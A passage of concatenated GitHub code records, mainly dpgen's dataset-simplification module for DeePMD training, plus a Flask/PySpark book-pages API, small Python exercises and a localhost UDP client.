range(col_point):\r\n points.append(\r\n Point(randint(10, wid - 10), randint(10, hei - 10), 0, 0, green, 0))\r\n\r\n# initiation text\r\npygame.font.init()\r\nfont1 = pygame.font.Font(None, 30)\r\n\r\n# main cycle\r\ngo = True\r\nwhile True:\r\n xt, yt = pygame.mouse.get_pos() # find coordinate cursor\r\n for i in pygame.event.get():\r\n if i.type == pygame.QUIT:\r\n exit()\r\n if i.type == pygame.KEYDOWN:\r\n if i.key == pygame.K_ESCAPE:\r\n exit()\r\n if i.key == pygame.K_SPACE:\r\n if go:\r\n go = False\r\n else:\r\n go = True\r\n if i.type == pygame.MOUSEBUTTONDOWN:\r\n if i.button == 1: # LMB\r\n points.append(Point(xt, yt, 0, 0, green, 0))\r\n\r\n if go: # updating points\r\n win.fill(gray)\r\n [p.update() for p in points]\r\n\r\n # itself text\r\n colm = font1.render('Количество точек: ' + str(len(points)), 1, (0, 0, 0))\r\n win.blit(colm, (3, 3))\r\n\r\n # updating window\r\n pygame.display.flip()\r\n pygame.display.set_caption(f'FPS: {round(clock.get_fps())}')\r\n clock.tick(fps)","repo_name":"Stepainpy/Points","sub_path":"point v5.py","file_name":"point v5.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20060165896","text":"\"\"\"\r\n flask-api.py\r\n Flask based API to compute results using Pyspark\r\n\"\"\"\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom flask import Response\r\nfrom flask_json import FlaskJSON, JsonError, json_response\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.functions import *\r\nfrom pyspark.sql.types import *\r\nimport pandas as pd\r\nimport re\r\nimport sys\r\nimport ingestion.feed_collector\r\nfrom waitress import serve\r\n\r\napp = Flask(__name__)\r\njson = FlaskJSON(app)\r\n\r\n\r\n@json.encoder\r\ndef custom_encoder(o):\r\n pass\r\n\r\n\r\n@app.errorhandler(500)\r\ndef system_error(e):\r\n return json_response(status_=500, status=500, description=\"System error. Please contact administrator !!\")\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return app.send_static_file('index.html')\r\n\r\n\r\n@app.route(\"/adidas/api/get_total_pages\", methods=['POST'])\r\ndef get_total_pages():\r\n data = request.get_json(force=True)\r\n keys = data.keys()\r\n output = []\r\n author = \"\"\r\n results = []\r\n if 'author' in keys:\r\n author = data['author']\r\n print(\"author\", author)\r\n books_data_path = \"/adidas/data/cleaned/books/*.parquet\"\r\n authors_data_path = \"/adidas/data/cleaned/authors/*.parquet\"\r\n author_key = spark.read.parquet(authors_data_path).filter(col(\"name\") == author).select(\"author_key\").first()[0]\r\n output = spark.read.parquet(books_data_path).filter(col(\"author\") == author_key)\\\r\n .agg(sum(\"number_of_pages\").alias(\"total_pages_count\"))\r\n print(output)\r\n\r\n results = output.toPandas().to_json(orient=\"records\")\r\n\r\n return Response(results, mimetype='application/json')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n spark = SparkSession.builder.appName(\"adidas-case-study-api\").getOrCreate()\r\n serve(app, host=\"localhost\", port=\"5999\")\r\n","repo_name":"coderepairer/case-study","sub_path":"flask-api.py","file_name":"flask-api.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11570081956","text":"import re\nimport sys\nimport collections\ntext = sys.stdin.read()\ntext = text[:text.find('#')]\ntext = text.lower()\nwords = re.findall(r'\\w+', text)\nwords = [word if len(word) <= 15 else word[:15] for word in words]\ncount = collections.Counter(words)\nres = sorted(count.items(), key=lambda x: (-x[1], x[0]))\nprint(len(res))\nfor i in range(int(0.1*len(res))):\n print(f'{res[i][1]}:{res[i][0]}')","repo_name":"xxxhol1c/PTA-python","sub_path":"programming/7-1.py","file_name":"7-1.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"423698425","text":"# 프로그래머스 LV 2 : 타겟 넘버\ndef solution(numbers, target):\n length = len(numbers)\n answer = 0\n \n # 지금이 몇번째인지 세는 용도의 숫자와, 처음 배열의 숫자가 양수와 음수일 때\n stack = [(0, numbers[0]), (0, -(numbers[0]))]\n while stack:\n idx, total = stack.pop()\n \n if idx == length-1: # 배열을 모두 돌았으면\n if total == target: # 만약 경우의 수가 target이라면\n answer += 1\n else:\n stack.append((idx+1, total+numbers[idx+1]))\n stack.append((idx+1, total-numbers[idx+1]))\n \n return answer\n\n\n\nprint(solution([1, 1, 1, 1, 1], 3))","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"014주차/타겟 넘버/hyeongjun.py","file_name":"hyeongjun.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"8653435913","text":"import re\n\ntext = open('regex_sum_1241700.txt','r')\nlines = text.readlines()\nsum = 0\nfor l in lines:\n\tdigits = re.findall('[0-9]+',l)\n\tif(len(digits)!=0):\n\t\tfor i in digits:\n\t\t\tsum += int(i)\nprint(sum)\n","repo_name":"mkhorosh/dataCourse","sub_path":"1/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70538726633","text":"\"\"\"Simplify dataset (minimize the dataset size).\n\nInit:\npick up init data from dataset randomly\n\nIter:\n00: train models (same as generator)\n01: calculate model deviations of the rest dataset, pick up data with proper model deviaiton \n02: fp (optional, if the original dataset do not have fp data, same as generator)\n\"\"\"\nimport logging\nimport queue\nimport os\nimport json\nimport argparse\nimport pickle\nimport glob\nimport fnmatch\nimport dpdata\nimport numpy as np\n\nfrom dpgen import dlog\nfrom dpgen import SHORT_CMD\nfrom dpgen.util import sepline\nfrom dpgen.remote.decide_machine import decide_train_machine\nfrom dpgen.dispatcher.Dispatcher import Dispatcher, make_dispatcher\nfrom dpgen.generator.run import make_train, run_train, post_train, run_fp, post_fp, fp_name, model_devi_name, train_name, train_task_fmt, sys_link_fp_vasp_pp, make_fp_vasp_incar, make_fp_vasp_kp, make_fp_vasp_cp_cvasp, data_system_fmt, model_devi_task_fmt, fp_task_fmt\n# TODO: maybe the following functions can be moved to dpgen.util\nfrom dpgen.generator.lib.utils import log_iter, make_iter_name, create_path, record_iter\nfrom dpgen.remote.decide_machine import decide_train_machine, decide_fp_machine, decide_model_devi_machine\nfrom dpgen.generator.lib.gaussian import make_gaussian_input\n\n\npicked_data_name = \"data.picked\"\nrest_data_name = \"data.rest\"\naccurate_data_name = \"data.accurate\"\ndetail_file_name_prefix = \"details\"\nsys_name_fmt = 'sys.' + data_system_fmt\nsys_name_pattern = 'sys.[0-9]*[0-9]'\n\ndef expand_sys_str(root_dir):\n matches = []\n for root, dirnames, filenames in os.walk(root_dir, followlinks=True):\n for filename in fnmatch.filter(filenames, 'type.raw'):\n matches.append(root)\n matches.sort()\n dirnames = [os.path.basename(ii) for ii in matches]\n if (len(list(set(dirnames))) != len(matches)) :\n raise RuntimeError('duplicated system name: it is highly recommend to place all systems in the same level of directory and has different names')\n return matches\n\n\ndef get_system_cls(jdata):\n if jdata.get(\"labeled\", False):\n return dpdata.LabeledSystem\n return dpdata.System\n\n\ndef get_multi_system(path, jdata):\n system = get_system_cls(jdata)\n systems = dpdata.MultiSystems(\n *[system(os.path.join(path, s), fmt='deepmd/npy') for s in os.listdir(path)])\n return systems\n\n\ndef get_systems(path, jdata):\n system_cls = get_system_cls(jdata)\n system_paths = expand_sys_str(path) \n systems = {}\n for ii in system_paths:\n systems[os.path.basename(ii)] = system_cls(ii, fmt='deepmd/npy')\n return systems\n\n\ndef get_system_idx(path):\n system_paths = expand_sys_str(path) \n sys_idx_map = {}\n for idx,ii in enumerate(system_paths):\n sys_idx_map[os.path.basename(ii)] = idx\n return sys_idx_map\n\n\ndef init_model(iter_index, jdata, mdata):\n training_init_model = jdata.get('training_init_model', False)\n if not training_init_model:\n return\n iter0_models = []\n training_iter0_model = jdata.get('training_iter0_model_path', [])\n if type(training_iter0_model) == str:\n training_iter0_model = [training_iter0_model]\n for ii in training_iter0_model: \n model_is = glob.glob(ii)\n model_is.sort()\n iter0_models += [os.path.abspath(ii) for ii in model_is]\n numb_models = jdata['numb_models']\n assert(numb_models == len(iter0_models)), \"training_iter0_model_path should be provided, and the number of models should be equal to %d\" % numb_models\n work_path = os.path.join(make_iter_name(iter_index), train_name)\n create_path(work_path)\n cwd = os.getcwd()\n for ii in range(len(iter0_models)):\n train_path = os.path.join(work_path, train_task_fmt % ii)\n create_path(train_path)\n os.chdir(train_path)\n ckpt_files = glob.glob(os.path.join(iter0_models[ii], 'model.ckpt*'))\n for jj in ckpt_files:\n os.symlink(jj, os.path.basename(jj))\n os.chdir(cwd)\n\n\ndef init_pick(iter_index, jdata, mdata):\n \"\"\"pick up init data from dataset randomly\"\"\"\n pick_data = jdata['pick_data']\n init_pick_number = jdata['init_pick_number']\n use_clusters = jdata.get('use_clusters', False)\n # use MultiSystems with System\n # TODO: support System and LabeledSystem\n # TODO: support other format\n if use_clusters:\n systems = get_multi_system(pick_data, jdata)\n else:\n systems = get_systems(pick_data, jdata)\n # label the system\n labels = []\n if use_clusters:\n items = systems.systems.items()\n else:\n items = systems.items()\n for key, system in items:\n labels.extend([(key, j) for j in range(len(system))])\n\n # random pick\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n create_path(work_path)\n idx = np.arange(len(labels))\n np.random.shuffle(idx)\n pick_idx = idx[:init_pick_number]\n rest_idx = idx[init_pick_number:]\n\n # dump the init data\n sys_data_path = os.path.join(work_path, picked_data_name)\n _init_dump_selected_frames(systems, labels, pick_idx, sys_data_path, jdata)\n\n # dump the rest data\n sys_data_path = os.path.join(work_path, rest_data_name)\n _init_dump_selected_frames(systems, labels, rest_idx, sys_data_path, jdata)\n\n\ndef _add_system(systems, key, system):\n if key in systems.keys():\n systems[key].append(system)\n else:\n systems[key] = system\n return systems\n\n\ndef _init_dump_selected_frames(systems, labels, selc_idx, sys_data_path, jdata):\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n if use_clusters:\n selc_systems = dpdata.MultiSystems()\n for j in selc_idx:\n sys_name, sys_id = labels[j]\n selc_systems.append(systems[sys_name][sys_id])\n selc_systems.to_deepmd_raw(sys_data_path)\n selc_systems.to_deepmd_npy(sys_data_path, set_size=selc_idx.size)\n else:\n selc_systems = {}\n for j in selc_idx:\n sys_name, sys_id = labels[j]\n selc_systems = _add_system(selc_systems, sys_name, systems[sys_name][sys_id])\n sys_idx_map = get_system_idx(pick_data)\n for kk in selc_systems.keys():\n sub_path = os.path.join(sys_data_path, sys_name_fmt % sys_idx_map[kk])\n selc_systems[kk].to_deepmd_raw(sub_path)\n selc_systems[kk].to_deepmd_npy(sub_path, set_size=selc_idx.size)\n with open(os.path.join(sys_data_path, 'sys_idx_map.json'), 'w') as fp:\n json.dump(sys_idx_map, fp, indent=4)\n\ndef _dump_system_dict(systems, path):\n for kk in systems:\n sub_path = os.path.join(path, sys_name_fmt % (int(kk)))\n systems[kk].to_deepmd_raw(sub_path)\n systems[kk].to_deepmd_npy(sub_path, set_size=systems[kk].get_nframes())\n\n\ndef make_model_devi(iter_index, jdata, mdata):\n \"\"\"calculate the model deviation of the rest idx\"\"\"\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n create_path(work_path)\n # link the model\n train_path = os.path.join(iter_name, train_name)\n train_path = os.path.abspath(train_path)\n models = glob.glob(os.path.join(train_path, \"graph*pb\"))\n for mm in models:\n model_name = os.path.basename(mm)\n os.symlink(mm, os.path.join(work_path, model_name))\n # link the last rest data\n last_iter_name = make_iter_name(iter_index-1)\n rest_data_path = os.path.join(last_iter_name, model_devi_name, rest_data_name)\n if not os.path.exists(rest_data_path):\n return False\n if use_clusters:\n for jj, subsystem in enumerate(os.listdir(rest_data_path)):\n task_name = \"task.\" + model_devi_task_fmt % (0, jj)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path)\n os.symlink(os.path.abspath(os.path.join(rest_data_path, subsystem)),\n os.path.abspath(os.path.join(task_path, rest_data_name)))\n else:\n rest_data_path = os.path.abspath(rest_data_path)\n sys_path = glob.glob(os.path.join(rest_data_path, sys_name_pattern))\n cwd = os.getcwd()\n for ii in sys_path:\n task_name = \"task.\" + model_devi_task_fmt % (int(os.path.basename(ii).split('.')[1]), 0)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path) \n os.chdir(task_path)\n os.symlink(os.path.relpath(ii), rest_data_name)\n os.chdir(cwd)\n os.chdir(cwd)\n return True\n\n\ndef run_model_devi(iter_index, jdata, mdata):\n \"\"\"submit dp test tasks\"\"\"\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n # generate command\n commands = []\n tasks = glob.glob(os.path.join(work_path, \"task.*\"))\n run_tasks = [os.path.basename(ii) for ii in tasks]\n # get models\n models = glob.glob(os.path.join(work_path, \"graph*pb\"))\n model_names = [os.path.basename(ii) for ii in models]\n task_model_list = []\n for ii in model_names:\n task_model_list.append(os.path.join('..', ii))\n # get max data size\n data_size = max([len(dpdata.System(os.path.join(\n task, rest_data_name), fmt=\"deepmd/npy\")) for task in tasks])\n # models\n commands = []\n detail_file_names = []\n for ii, mm in enumerate(task_model_list):\n detail_file_name = \"{prefix}.{ii}\".format(\n prefix=detail_file_name_prefix,\n ii=ii,\n )\n # TODO: support 0.x?\n command = \"{python} -m deepmd test -m {model} -s {system} -n {numb_test} -d {detail_file}\".format(\n python=mdata['python_test_path'],\n model=mm,\n system=rest_data_name,\n numb_test=data_size,\n detail_file=detail_file_name,\n )\n commands.append(command)\n detail_file_names.append(detail_file_name)\n # submit\n try:\n model_devi_group_size = mdata['model_devi_group_size']\n except:\n model_devi_group_size = 1\n\n forward_files = [rest_data_name]\n backward_files = sum([[pf+\".e.out\", pf+\".f.out\", pf+\".v.out\"] for pf in detail_file_names], [])\n\n dispatcher = make_dispatcher(mdata['model_devi_machine'], mdata['model_devi_resources'], work_path, run_tasks, model_devi_group_size)\n dispatcher.run_jobs(mdata['model_devi_resources'],\n commands,\n work_path,\n run_tasks,\n model_devi_group_size,\n model_names,\n forward_files,\n backward_files,\n outlog='model_devi.log',\n errlog='model_devi.log')\n\n\ndef post_model_devi(iter_index, jdata, mdata):\n \"\"\"calculate the model deviation\"\"\"\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, model_devi_name)\n tasks = glob.glob(os.path.join(work_path, \"task.*\"))\n tasks.sort()\n\n e_trust_lo = jdata['e_trust_lo']\n e_trust_hi = jdata['e_trust_hi']\n f_trust_lo = jdata['f_trust_lo']\n f_trust_hi = jdata['f_trust_hi']\n\n if use_clusters:\n sys_accurate = dpdata.MultiSystems()\n sys_candinate = dpdata.MultiSystems()\n sys_failed = dpdata.MultiSystems()\n else:\n sys_accurate = {}\n sys_candinate = {}\n sys_failed = {}\n all_names = set()\n\n for task in tasks:\n if not use_clusters:\n sys_name = os.path.basename(task).split('.')[1]\n all_names.add(sys_name)\n # e.out\n details_e = glob.glob(os.path.join(task, \"{}.*.e.out\".format(detail_file_name_prefix)))\n e_all = np.array([np.loadtxt(detail_e, ndmin=2)[:, 1] for detail_e in details_e])\n e_std = np.std(e_all, axis=0)\n n_frame = e_std.size\n \n # f.out\n details_f = glob.glob(os.path.join(task, \"{}.*.f.out\".format(detail_file_name_prefix)))\n f_all = np.array([np.loadtxt(detail_f, ndmin=2)[:, 3:6].reshape((n_frame, -1, 3)) for detail_f in details_f])\n # (n_model, n_frame, n_atom, 3)\n f_std = np.std(f_all, axis=0)\n # (n_frame, n_atom, 3)\n f_std = np.linalg.norm(f_std, axis=2)\n # (n_frame, n_atom)\n f_std = np.max(f_std, axis=1)\n # (n_frame,)\n\n system_cls = get_system_cls(jdata)\n for subsys, e_devi, f_devi in zip(system_cls(os.path.join(task, rest_data_name), fmt='deepmd/npy'), e_std, f_std):\n if (e_devi < e_trust_hi and e_devi >= e_trust_lo) or (f_devi < f_trust_hi and f_devi >= f_trust_lo) :\n if use_clusters:\n sys_candinate.append(subsys)\n else:\n sys_candinate = _add_system(sys_candinate, sys_name, subsys)\n elif (e_devi >= e_trust_hi ) or (f_devi >= f_trust_hi ):\n if use_clusters:\n sys_failed.append(subsys)\n else:\n sys_failed = _add_system(sys_failed, sys_name, subsys)\n elif (e_devi < e_trust_lo and f_devi < f_trust_lo ):\n if use_clusters:\n sys_accurate.append(subsys)\n else:\n sys_accurate = _add_system(sys_accurate, sys_name, subsys)\n else:\n raise RuntimeError('reach a place that should NOT be reached...')\n if use_clusters:\n counter = {\"candidate\": sys_candinate.get_nframes(), \"accurate\": sys_accurate.get_nframes(), \"failed\": sys_failed.get_nframes()}\n fp_sum = sum(counter.values())\n for cc_key, cc_value in counter.items():\n dlog.info(\"{0:9s} : {1:6d} in {2:6d} {3:6.2f} %\".format(cc_key, cc_value, fp_sum, cc_value/fp_sum*100))\n else:\n all_names = list(all_names)\n all_names.sort()\n counter = {\"candidate\": 0, \"accurate\": 0, \"failed\": 0}\n for kk in all_names:\n sys_counter = {\"candidate\": 0, \"accurate\": 0, \"failed\": 0}\n if kk in sys_candinate.keys():\n sys_counter['candidate'] += sys_candinate[kk].get_nframes()\n if kk in sys_accurate.keys():\n sys_counter['accurate'] += sys_accurate[kk].get_nframes()\n if kk in sys_failed.keys():\n sys_counter['failed'] += sys_failed[kk].get_nframes()\n fp_sum = sum(sys_counter.values())\n for cc_key, cc_value in sys_counter.items():\n if fp_sum != 0:\n dlog.info(\"sys{0:s} {1:9s} : {2:6d} in {3:6d} {4:6.2f} %\".format(kk, cc_key, cc_value, fp_sum, cc_value/fp_sum*100))\n else:\n dlog.info(\"sys{0:s} {1:9s} : {2:6d} in {3:6d} {4:6.2f} %\".format(kk, cc_key, cc_value, fp_sum, 0*100))\n for ii in ['candidate', 'accurate', 'failed']:\n counter[ii] += sys_counter[ii]\n \n if counter['candidate'] == 0 and counter['failed'] > 0:\n raise RuntimeError('no candidate but still have failed cases, stop. You may want to refine the training or to increase the trust level hi')\n\n # label the candidate system\n labels = []\n if use_clusters:\n items = sys_candinate.systems.items()\n else:\n items = sys_candinate.items()\n for key, system in items:\n labels.extend([(key, j) for j in range(len(system))])\n # candinate: pick up randomly\n iter_pick_number = jdata['iter_pick_number']\n idx = np.arange(counter['candidate'])\n assert(len(idx) == len(labels))\n np.random.shuffle(idx)\n pick_idx = idx[:iter_pick_number]\n rest_idx = idx[iter_pick_number:]\n dlog.info(\"total candidate {0:6d} picked {1:6d} ({2:6.2f} %) rest {3:6d} ({4:6.2f} % )\".format\\\n (counter['candidate'], len(pick_idx), float(len(pick_idx))/counter['candidate']*100., len(rest_idx), float(len(rest_idx))/counter['candidate']*100.))\n\n # dump the picked candinate data\n if use_clusters:\n picked_systems = dpdata.MultiSystems()\n for j in pick_idx:\n sys_name, sys_id = labels[j]\n picked_systems.append(sys_candinate[sys_name][sys_id])\n sys_data_path = os.path.join(work_path, picked_data_name)\n picked_systems.to_deepmd_raw(sys_data_path)\n picked_systems.to_deepmd_npy(sys_data_path, set_size=iter_pick_number)\n else:\n selc_systems = {}\n for j in pick_idx:\n sys_name, sys_id = labels[j]\n selc_systems = _add_system(selc_systems, sys_name, sys_candinate[sys_name][sys_id])\n sys_data_path = os.path.join(work_path, picked_data_name)\n _dump_system_dict(selc_systems, sys_data_path)\n\n # dump the rest data (not picked candinate data and failed data)\n if use_clusters:\n rest_systems = dpdata.MultiSystems()\n for j in rest_idx:\n sys_name, sys_id = labels[j]\n rest_systems.append(sys_candinate[sys_name][sys_id])\n rest_systems += sys_failed\n sys_data_path = os.path.join(work_path, rest_data_name)\n rest_systems.to_deepmd_raw(sys_data_path)\n rest_systems.to_deepmd_npy(sys_data_path, set_size=rest_idx.size)\n else:\n selc_systems = {}\n for j in rest_idx:\n sys_name, sys_id = labels[j]\n selc_systems = _add_system(selc_systems, sys_name, sys_candinate[sys_name][sys_id])\n for kk in sys_failed.keys():\n selc_systems = _add_system(selc_systems, kk, sys_failed[kk]) \n sys_data_path = os.path.join(work_path, rest_data_name)\n _dump_system_dict(selc_systems, sys_data_path)\n\n # dump the accurate data -- to another directory\n if use_clusters:\n sys_data_path = os.path.join(work_path, accurate_data_name)\n sys_accurate.to_deepmd_raw(sys_data_path)\n sys_accurate.to_deepmd_npy(sys_data_path, set_size=sys_accurate.get_nframes())\n else:\n sys_data_path = os.path.join(work_path, accurate_data_name)\n _dump_system_dict(sys_accurate, sys_data_path)\n\n\ndef make_fp_labeled(iter_index, jdata): \n dlog.info(\"already labeled, skip make_fp and link data directly\")\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, fp_name)\n create_path(work_path)\n picked_data_path = os.path.join(iter_name, model_devi_name, picked_data_name)\n if use_clusters:\n os.symlink(os.path.abspath(picked_data_path), os.path.abspath(\n os.path.join(work_path, \"task.\" + data_system_fmt % 0)))\n os.symlink(os.path.abspath(picked_data_path), os.path.abspath(\n os.path.join(work_path, \"data.\" + data_system_fmt % 0)))\n else:\n picked_data_path = os.path.abspath(picked_data_path)\n sys_path = glob.glob(os.path.join(picked_data_path, sys_name_pattern))\n cwd = os.getcwd()\n os.chdir(work_path)\n for ii in sys_path:\n sys_idx = os.path.basename(ii).split('.')[1]\n data_dir = 'data.' + data_system_fmt % int(sys_idx)\n task_dir = 'task.' + data_system_fmt % int(sys_idx)\n os.symlink(os.path.relpath(ii), data_dir)\n os.symlink(os.path.relpath(ii), task_dir)\n os.chdir(cwd)\n\n\ndef make_fp_configs(iter_index, jdata):\n pick_data = jdata['pick_data']\n use_clusters = jdata.get('use_clusters', False)\n iter_name = make_iter_name(iter_index)\n work_path = os.path.join(iter_name, fp_name)\n create_path(work_path)\n picked_data_path = os.path.join(iter_name, model_devi_name, picked_data_name)\n if use_clusters:\n systems = get_multi_system(picked_data_path, jdata)\n jj = 0\n for system in systems:\n for subsys in system:\n task_name = \"task.\" + fp_task_fmt % (0, jj)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path)\n subsys.to('vasp/poscar', os.path.join(task_path, 'POSCAR'))\n jj += 1\n else:\n picked_data_path = os.path.abspath(picked_data_path)\n sys_path = glob.glob(os.path.join(picked_data_path, sys_name_pattern))\n for ii in sys_path:\n tmp_sys = dpdata.System(ii, fmt = 'deepmd/npy')\n sys_idx = os.path.basename(ii).split('.')[1]\n jj = 0\n for ss in tmp_sys:\n task_name = \"task.\" + fp_task_fmt % (int(sys_idx), jj)\n task_path = os.path.join(work_path, task_name)\n create_path(task_path)\n ss.to('vasp/poscar', os.path.join(task_path, 'POSCAR'))\n job = {}\n with open(os.path.join(task_path, 'job.json'), 'w') as fp:\n json.dump(job, fp, indent=4)\n jj += 1\n\n\ndef make_fp_gaussian(iter_index, jdata):\n work_path = os.path.join(make_iter_name(iter_index), fp_name)\n fp_tasks = glob.glob(os.path.join(work_path, 'task.*'))\n cwd = os.getcwd()\n if 'user_fp_params' in jdata.keys() :\n fp_params = jdata['user_fp_params']\n else:\n fp_params = jdata['fp_params']\n cwd = os.getcwd()\n for ii in fp_tasks:\n os.chdir(ii)\n sys_data = dpdata.System('POSCAR').data\n ret = make_gaussian_input(sys_data, fp_params)\n with open('input', 'w') as fp:\n fp.write(ret)\n os.chdir(cwd)\n\n\ndef make_fp_vasp(iter_index, jdata):\n # abs path for fp_incar if it exists\n if 'fp_incar' in jdata:\n jdata['fp_incar'] = os.path.abspath(jdata['fp_incar'])\n # get nbands esti if it exists\n if 'fp_nbands_esti_data' in jdata:\n nbe = NBandsEsti(jdata['fp_nbands_esti_data'])\n else:\n nbe = None\n # order is critical!\n # 1, create potcar\n sys_link_fp_vasp_pp(iter_index, jdata)\n # 2, create incar\n make_fp_vasp_incar(iter_index, jdata, nbands_esti = nbe)\n # 3, create kpoints\n make_fp_vasp_kp(iter_index, jdata)\n # 4, copy cvasp\n make_fp_vasp_cp_cvasp(iter_index,jdata)\n\n\ndef make_fp_calculation(iter_index, jdata):\n fp_style = jdata['fp_style']\n if fp_style == 'vasp':\n make_fp_vasp(iter_index, jdata)\n elif fp_style == 'gaussian':\n make_fp_gaussian(iter_index, jdata)\n else :\n raise RuntimeError('unsupported fp_style ' + fp_style)\n\n\ndef make_fp(iter_index, jdata, mdata):\n labeled = jdata.get(\"labeled\", False)\n if labeled:\n make_fp_labeled(iter_index, jdata)\n else:\n make_fp_configs(iter_index, jdata)\n make_fp_calculation(iter_index, jdata)\n\n\ndef run_iter(param_file, machine_file):\n \"\"\" init (iter 0): init_pick\n\n tasks (iter > 0):\n 00 make_train (same as generator)\n 01 run_train (same as generator)\n 02 post_train (same as generator)\n 03 make_model_devi\n 04 run_model_devi\n 05 post_model_devi\n 06 make_fp\n 07 run_fp (same as generator)\n 08 post_fp (same as generator)\n \"\"\"\n # TODO: function of handling input json should be combined as one function\n try:\n import ruamel\n from monty.serialization import loadfn, dumpfn\n warnings.simplefilter(\n 'ignore', ruamel.yaml.error.MantissaNoDotYAML1_1Warning)\n jdata = loadfn(param_file)\n mdata = loadfn(machine_file)\n except:\n with open(param_file, 'r') as fp:\n jdata = json.load(fp)\n with open(machine_file, 'r') as fp:\n mdata = json.load(fp)\n\n if jdata.get('pretty_print', False):\n fparam = SHORT_CMD+'_' + \\\n param_file.split('.')[0]+'.'+jdata.get('pretty_format', 'json')\n dumpfn(jdata, fparam, indent=4)\n fmachine = SHORT_CMD+'_' + \\\n machine_file.split('.')[0]+'.'+jdata.get('pretty_format', 'json')\n dumpfn(mdata, fmachine, indent=4)\n\n if mdata.get('handlers', None):\n if mdata['handlers'].get('smtp', None):\n que = queue.Queue(-1)\n queue_handler = logging.handlers.QueueHandler(que)\n smtp_handler = logging.handlers.SMTPHandler(\n **mdata['handlers']['smtp'])\n listener = logging.handlers.QueueListener(que, smtp_handler)\n dlog.addHandler(queue_handler)\n listener.start()\n\n max_tasks = 10000\n numb_task = 9\n record = \"record.dpgen\"\n iter_rec = [0, -1]\n if os.path.isfile(record):\n with open(record) as frec:\n for line in frec:\n iter_rec = [int(x) for x in line.split()]\n dlog.info(\"continue from iter %03d task %02d\" %\n (iter_rec[0], iter_rec[1]))\n\n cont = True\n ii = -1\n while cont:\n ii += 1\n iter_name = make_iter_name(ii)\n sepline(iter_name, '=')\n for jj in range(numb_task):\n if ii * max_tasks + jj <= iter_rec[0] * max_tasks + iter_rec[1]:\n continue\n task_name = \"task %02d\" % jj\n sepline(\"{} {}\".format(iter_name, task_name), '-')\n jdata['model_devi_jobs'] = [{} for _ in range(ii+1)]\n if ii == 0 and jj < 6:\n if jj == 0:\n log_iter(\"init_pick\", ii, jj)\n init_model(ii, jdata, mdata)\n init_pick(ii, jdata, mdata)\n dlog.info(\"first iter, skip step 1-5\")\n elif jj == 0:\n log_iter(\"make_train\", ii, jj)\n make_train(ii, jdata, mdata)\n elif jj == 1:\n log_iter(\"run_train\", ii, jj)\n mdata = decide_train_machine(mdata)\n #disp = make_dispatcher(mdata['train_machine'])\n run_train(ii, jdata, mdata)\n elif jj == 2:\n log_iter(\"post_train\", ii, jj)\n post_train(ii, jdata, mdata)\n elif jj == 3:\n log_iter(\"make_model_devi\", ii, jj)\n cont = make_model_devi(ii, jdata, mdata)\n if not cont or ii >= jdata.get(\"stop_iter\", ii+1):\n break\n elif jj == 4:\n log_iter(\"run_model_devi\", ii, jj)\n mdata = decide_model_devi_machine(mdata)\n #disp = make_dispatcher(mdata['model_devi_machine'])\n run_model_devi(ii, jdata, mdata)\n elif jj == 5:\n log_iter(\"post_model_devi\", ii, jj)\n post_model_devi(ii, jdata, mdata)\n elif jj == 6:\n log_iter(\"make_fp\", ii, jj)\n make_fp(ii, jdata, mdata)\n elif jj == 7:\n log_iter(\"run_fp\", ii, jj)\n if jdata.get(\"labeled\", False):\n dlog.info(\"already have labeled data, skip run_fp\")\n else:\n mdata = decide_fp_machine(mdata)\n #disp = make_dispatcher(mdata['fp_machine'])\n run_fp(ii, jdata, mdata)\n elif jj == 8:\n log_iter(\"post_fp\", ii, jj)\n if jdata.get(\"labeled\", False):\n dlog.info(\"already have labeled data, skip post_fp\")\n else:\n post_fp(ii, jdata)\n else:\n raise RuntimeError(\"unknown task %d, something wrong\" % jj)\n record_iter(record, ii, jj)\n\n\ndef gen_simplify(args):\n if args.PARAM and args.MACHINE:\n if args.debug:\n dlog.setLevel(logging.DEBUG)\n dlog.info(\"start simplifying\")\n run_iter(args.PARAM, args.MACHINE)\n dlog.info(\"finished\")\n","repo_name":"fengwangxmu/dpgen_mod","sub_path":"dpgen/simplify/simplify.py","file_name":"simplify.py","file_ext":"py","file_size_in_byte":27485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14430802715","text":"import socket\r\nimport time\r\nlocalIP= \"127.0.0.1\"\r\nlocalPort= 80\r\ncomando=\"\"\r\nvariabie=\"\"\r\nstinga=\"\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\nwhile True:\r\n comando=input(\"inserisci il comando\")\r\n variabie=(input(\"inserisci la variabile\"))\r\n stringa=comando + \"_\" + variabie\r\n s.sendto(stringa.encode(), (localIP, 